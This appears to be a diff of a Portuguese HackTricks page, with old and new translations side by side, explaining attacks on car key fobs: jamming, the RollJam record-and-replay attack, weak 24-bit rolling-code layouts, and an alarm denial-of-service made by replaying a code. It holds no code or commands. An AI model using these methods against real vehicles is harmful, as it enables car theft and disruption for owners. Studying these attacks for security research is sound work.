**O Jamming funciona**, mas é perceptível, pois se a **pessoa que tranca o carro simplesmente testar as portas** para garantir que estejam trancadas, ela perceberá que o carro está destrancado. Além disso, se estiverem cientes de tais ataques, eles podem até ouvir o fato de que as portas não fizeram o **som** de travamento ou as **luzes** do carro não piscaram quando pressionaram o botão 'travar'.
**Jamming funciona**, mas é perceptível, pois se a **pessoa trancando o carro simplesmente testar as portas** para garantir que estão trancadas, notaria o carro destrancado. Além disso, se estivessem cientes de tais ataques, poderiam até ouvir o fato de que as portas nunca fizeram o som de **trava** ou as **luzes** do carro nunca piscaram quando pressionaram o botão de 'trancar'.
{% endhint %}
### **Ataque de Captura de Código (também conhecido como 'RollJam')**
Este é uma técnica de **interferência mais furtiva**. O atacante irá interferir no sinal, de modo que quando a vítima tente trancar a porta, não funcione, mas o atacante irá **gravar esse código**. Em seguida, a vítima irá **tentar trancar o carro novamente** pressionando o botão e o carro irá **gravar esse segundo código**.\
Imediatamente após isso, o **atacante pode enviar o primeiro código** e o **carro irá trancar** (a vítima pensará que a segunda pressão o fechou). Em seguida, o atacante será capaz de **enviar o segundo código roubado para abrir** o carro (supondo que um **código de "fechar carro" também possa ser usado para abri-lo**). Uma mudança de frequência pode ser necessária (pois existem carros que usam os mesmos códigos para abrir e fechar, mas escutam ambos os comandos em frequências diferentes).
Esta é uma técnica de Jamming mais **discreta**. O atacante bloqueará o sinal, então quando a vítima tentar trancar a porta, não funcionará, mas o atacante **gravará este código**. Então, a vítima tentará **trancar o carro novamente** pressionando o botão e o carro **gravará este segundo código**.\
Imediatamente após isso, o **atacante pode enviar o primeiro código** e o **carro trancará** (a vítima pensará que a segunda pressionada fechou). Então, o atacante poderá **enviar o segundo código roubado para abrir** o carro (supondo que um **código de 'fechar carro'** também possa ser usado para abri-lo). Uma mudança de frequência pode ser necessária (já que há carros que usam os mesmos códigos para abrir e fechar, mas ouvem ambos os comandos em frequências diferentes).
O atacante pode **interferir no receptor do carro e não no seu receptor** porque se o receptor do carro estiver escutando, por exemplo, em uma banda larga de 1MHz, o atacante não irá **interferir** na frequência exata usada pelo controle remoto, mas sim **em uma próxima nesse espectro**, enquanto o **receptor do atacante estará escutando em uma faixa menor** onde ele pode escutar o sinal do controle remoto **sem o sinal de interferência**.
O atacante pode **bloquear o receptor do carro e não o seu próprio receptor** porque se o receptor do carro estiver ouvindo, por exemplo, uma banda larga de 1MHz, o atacante não **bloqueará** a frequência exata usada pelo controle remoto, mas **uma próxima nesse espectro** enquanto o **receptor do atacante estará ouvindo em uma faixa menor** onde ele pode ouvir o sinal do controle remoto **sem o sinal de bloqueio**.
{% hint style="warning" %}
Outras implementações vistas em especificações mostram que o **código rolante é uma parte** do código total enviado. Ou seja, o código enviado é uma **chave de 24 bits**, onde os primeiros **12 são o código rolante**, os **segundos 8 são o comando** (como trancar ou destrancar) e os últimos 4 são o **checksum**. Veículos que implementam esse tipo também são naturalmente suscetíveis, pois o atacante só precisa substituir o segmento do código rolante para poder **usar qualquer código rolante em ambas as frequências**.
Outras implementações vistas nas especificações mostram que o **código rolante é uma parte** do código total enviado. Ou seja, o código enviado é uma **chave de 24 bits** onde os primeiros **12 são o código rolante**, os **8 seguintes são o comando** (como trancar ou destrancar) e os últimos 4 são o **checksum**. Veículos que implementam esse tipo também são naturalmente suscetíveis, pois o atacante apenas precisa substituir o segmento do código rolante para poder **usar qualquer código rolante em ambas as frequências**.
{% endhint %}
{% hint style="danger" %}
Observe que se a vítima enviar um terceiro código enquanto o atacante estiver enviando o primeiro, o primeiro e o segundo código serão invalidados.
{% endhint %}
### Ataque de Interferência com Alarme Sonoro
### Ataque de Jamming com Alarme Sonoro
Testando contra um sistema de código rolante de mercado instalado em um carro, **enviar o mesmo código duas vezes** imediatamente **ativou o alarme** e o imobilizador, proporcionando uma oportunidade única de **negação de serviço**. Ironicamente, a forma de **desativar o alarme** e o imobilizador era **pressionar** o **controle remoto**, fornecendo ao atacante a capacidade de **realizar continuamente um ataque de negação de serviço**. Ou misturar esse ataque com o **anterior para obter mais códigos**, já que a vítima gostaria de interromper o ataque o mais rápido possível.
Testando contra um sistema de código rolante pós-venda instalado em um carro, **enviar o mesmo código duas vezes** imediatamente **ativou o alarme** e o imobilizador, proporcionando uma oportunidade única de **negação de serviço**. Ironicamente, o meio de **desativar o alarme** e o imobilizador era **pressionar** o **controle remoto**, proporcionando a um atacante a capacidade de **realizar continuamente o ataque de DoS**. Ou misture este ataque com o **anterior para obter mais códigos** já que a vítima gostaria de parar o ataque o mais rápido possível.
## Referências
@ -98,12 +101,14 @@ Testando contra um sistema de código rolante de mercado instalado em um carro,
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>